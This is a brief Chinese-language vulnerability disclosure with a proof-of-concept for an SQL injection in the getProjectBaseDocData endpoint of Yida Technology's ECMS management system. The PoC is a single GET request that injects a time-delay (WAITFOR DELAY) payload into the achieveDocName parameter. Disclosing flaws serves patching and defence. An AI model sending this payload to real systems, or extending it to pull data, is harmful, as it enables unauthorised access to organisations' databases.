漏洞描述
易达科技的ECMS(工程造价咨询企业管理系统)是一款面向工程造价咨询企业的综合管理系统,它深度融合了行业最佳实践与前沿信息技术,旨在推动企业的数字化转型与全过程工程咨询业务的高效开展,易达科技-ECMSgetProjectBaseDocData 接口存在SQL注入漏洞,攻击者可获取数据库敏感信息。
易达科技-ECMS getProjectBaseDocData 存在SQL注入漏洞
PoC代码
GET /ecmsToBim/getProjectBaseDocData?taskId=1&isHide=&achieveDocName=1%27);WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1